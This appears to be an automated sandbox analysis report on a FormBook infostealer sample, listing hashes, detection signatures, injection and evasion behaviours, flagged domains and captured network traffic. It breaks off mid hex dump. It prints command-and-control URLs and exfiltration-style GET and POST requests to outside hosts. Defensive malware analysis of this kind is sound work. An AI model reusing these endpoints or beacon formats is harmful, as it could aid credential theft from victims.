Windows Analysis Report
yZcecBUXN7.exe

Overview

General Information

Sample name: yZcecBUXN7.exe
renamed because original name is a hash value
Original sample name: 9cd48f0d93c28ae6559409de23414554.exe
Analysis ID: 1435169
MD5: 9cd48f0d93c28ae6559409de23414554
SHA1: a6a625d2dce72bf9f7deee747c95ed7f7cf36cd0
SHA256: 3ed0095ee2de05e81ac2c954eb0df312d6b919d871b60ce4265acd266be09d3c
Tags: 32exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code references suspicious native API functions
Deletes itself after installation
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://www.dhleba51.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM= Avira URL Cloud: Label: malware
Source: http://www.bnbuotqakx.shop/0hhg/ Avira URL Cloud: Label: malware
Source: http://www.dhleba51.ru/0hhg/ Avira URL Cloud: Label: malware
Source: http://www.vavada-band.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40= Avira URL Cloud: Label: malware
Source: http://www.bnbuotqakx.shop Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: bnbuotqakx.shop Virustotal: Detection: 5% Perma Link
Source: www.vavada-band.ru Virustotal: Detection: 6% Perma Link
Source: http://www.bettaroom.ru/0hhg/ Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for submitted file
Source: yZcecBUXN7.exe ReversingLabs: Detection: 28%
Source: yZcecBUXN7.exe Virustotal: Detection: 37% Perma Link
Yara detected FormBook
Source: Yara match File source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: yZcecBUXN7.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: yZcecBUXN7.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: yZcecBUXN7.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: yZcecBUXN7.exe, 00000000.00000002.1628173538.0000000005330000.00000004.08000000.00040000.00000000.sdmp, yZcecBUXN7.exe, 00000000.00000002.1626818477.0000000002A71000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: netsh.pdb source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1770920776.000000000004E000.00000002.00000001.01000000.00000007.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972232269.000000000004E000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: wntdll.pdbUGP source: yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: yZcecBUXN7.exe, yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C1B710 FindFirstFileW,FindNextFileW,FindClose, 4_2_00C1B710
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then xor eax, eax 4_2_00C09350
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 203.161.50.127 203.161.50.127
Source: Joe Sandbox View IP Address: 195.24.68.5 195.24.68.5
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40= HTTP/1.1Host: www.vavada-band.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic HTTP traffic detected: GET /0hhg/?ABqDW6A8=20u2NLSYHglGGzLXpCvTxXPv5nfEDKk1YS+A026fVEbSVoETlWaKPzhT739k4HudG+XQgMpMmykoK0OCVVIx1ieYSqFXq5syzWGOoCFdAiVWKrRgEgzBh9g=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.bettaroom.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic HTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM= HTTP/1.1Host: www.dhleba51.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic HTTP traffic detected: GET /0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.dainikmirpur.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic HTTP traffic detected: GET /0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.dainikmirpur.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic HTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=OATZzJPiUUGU3mpjZciWUPZeXbT2MJCMteYhXkaeth47OgAuOtH7Ax1R5cSUzc8K7tJsdCLV7T20xyzul8wSbYrVofQNfqyssPuErqT1NUPeqaem3KrcSI4= HTTP/1.1Host: www.whirledairlines.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic HTTP traffic detected: GET /0hhg/?ABqDW6A8=nDs+4sFgmC14rZAzdMtU+fOluyCTVoLAn9AW6ezlSd5l//pRDkDNUYKtMPmQp3hOJuHIoac+nQZfVGszaQStOPCeLqTfiXL51+ke6KS/qQDP30/ytVZd2Oc=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.quantummquest.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic HTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=XN/uN6nMvrGkpcBz+Thv1jYaxJtcZ3guzCEwk+wO1IePrLEfQ2dONhxJJ5MfI8SrhyY28ykjUI4nvFFhDsPQuo7fansGo7O9hSpOWy12njMGsYSDFVmwrLg= HTTP/1.1Host: www.yamiyasheec.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic HTTP traffic detected: GET /0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX+Rn6aHsZLnu3NGBe2VBUm0fUZsnu3sABaHfjqCa4r+GKRPsyPs5e5gNT6h7MvS/nYKUeSlb7fRS9PCej43uXu++wSLzang=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.applesolve.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic HTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=4PSEdCTPIXdKXl7uh+LsBTwAtAbEEDmKYAJsxyVVq9bdmcYGjB9JHSE/ykX4VkYbcxwnxSFcyayelsVtdhVYibhKvsL7bWoBJw77jiRnpeIfkNF5+PYwYCo= HTTP/1.1Host: www.xxaiai.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic HTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=Np3vqe/1Cu/OQ51upJR8Qsht1t6ybRV+pU7NEwPzo+CdnJXCrwJJ0q4TeA3yrjOGKQp+qts/DZNdYR5Nz+PtVR15bhmDHV5jmEZsuo4OBXvm+mP+YyhGbOc= HTTP/1.1Host: www.dk48.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic HTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC+kK/un5r26ew8GYnMJKxFmClF8lXwwqE5TFZd2gxpf2h1MF48x8mm8dpDB1BgTHqwJGV3u14y6bwQsvyQrq4dK8= HTTP/1.1Host: www.cucuzeus88.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: www.vavada-band.ru
Source: global traffic DNS traffic detected: DNS query: www.bettaroom.ru
Source: global traffic DNS traffic detected: DNS query: www.dhleba51.ru
Source: global traffic DNS traffic detected: DNS query: www.dainikmirpur.com
Source: global traffic DNS traffic detected: DNS query: www.whirledairlines.com
Source: global traffic DNS traffic detected: DNS query: www.quantummquest.top
Source: global traffic DNS traffic detected: DNS query: www.yamiyasheec.online
Source: global traffic DNS traffic detected: DNS query: www.applesolve.com
Source: global traffic DNS traffic detected: DNS query: www.xxaiai.top
Source: global traffic DNS traffic detected: DNS query: www.vaesen.net
Source: global traffic DNS traffic detected: DNS query: www.dk48.lol
Source: global traffic DNS traffic detected: DNS query: www.cluird.cloud
Source: global traffic DNS traffic detected: DNS query: www.cucuzeus88.store
Source: global traffic DNS traffic detected: DNS query: www.bnbuotqakx.shop
Source: unknown HTTP traffic detected: POST /0hhg/ HTTP/1.1Host: www.bettaroom.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.bettaroom.ruContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Content-Length: 205Referer: http://www.bettaroom.ru/0hhg/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 41 42 71 44 57 36 41 38 3d 37 32 47 57 4f 2b 62 4f 47 46 35 32 47 46 58 2f 6b 6a 36 36 75 33 50 6f 77 6d 72 36 50 37 55 49 4d 52 4b 76 2b 32 57 65 66 31 76 38 55 4b 45 75 67 48 57 66 4b 7a 64 6b 30 53 31 6f 37 32 69 75 4e 74 37 72 74 4e 35 46 6a 53 4d 78 59 6d 66 51 64 30 4a 56 7a 54 36 53 4b 70 39 36 70 35 4e 31 6e 47 75 47 73 6d 4d 6a 4a 78 74 54 59 73 6c 71 46 6d 7a 6d 37 74 57 2f 38 37 57 45 66 63 6c 51 76 37 57 77 34 66 46 6b 78 48 70 7a 4a 4c 50 32 51 68 75 79 4c 76 54 71 47 6e 48 57 66 47 6a 32 47 47 48 44 36 68 46 51 49 4b 71 54 71 33 2f 74 58 56 4f 5a 6a 61 57 48 79 69 58 73 4a 44 62 4f 6c 51 3d 3d Data Ascii: ABqDW6A8=72GWO+bOGF52GFX/kj66u3Powmr6P7UIMRKv+2Wef1v8UKEugHWfKzdk0S1o72iuNt7rtN5FjSMxYmfQd0JVzT6SKp96p5N1nGuGsmMjJxtTYslqFmzm7tW/87WEfclQv7Ww4fFkxHpzJLP2QhuyLvTqGnHWfGj2GGHD6hFQIKqTq3/tXVOZjaWHyiXsJDbOlQ==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 May 2024 06:24:43 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Thu, 02 May 2024 06:25:20 GMTContent-Type: text/html; charset=utf-8Content-Length: 48773Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2
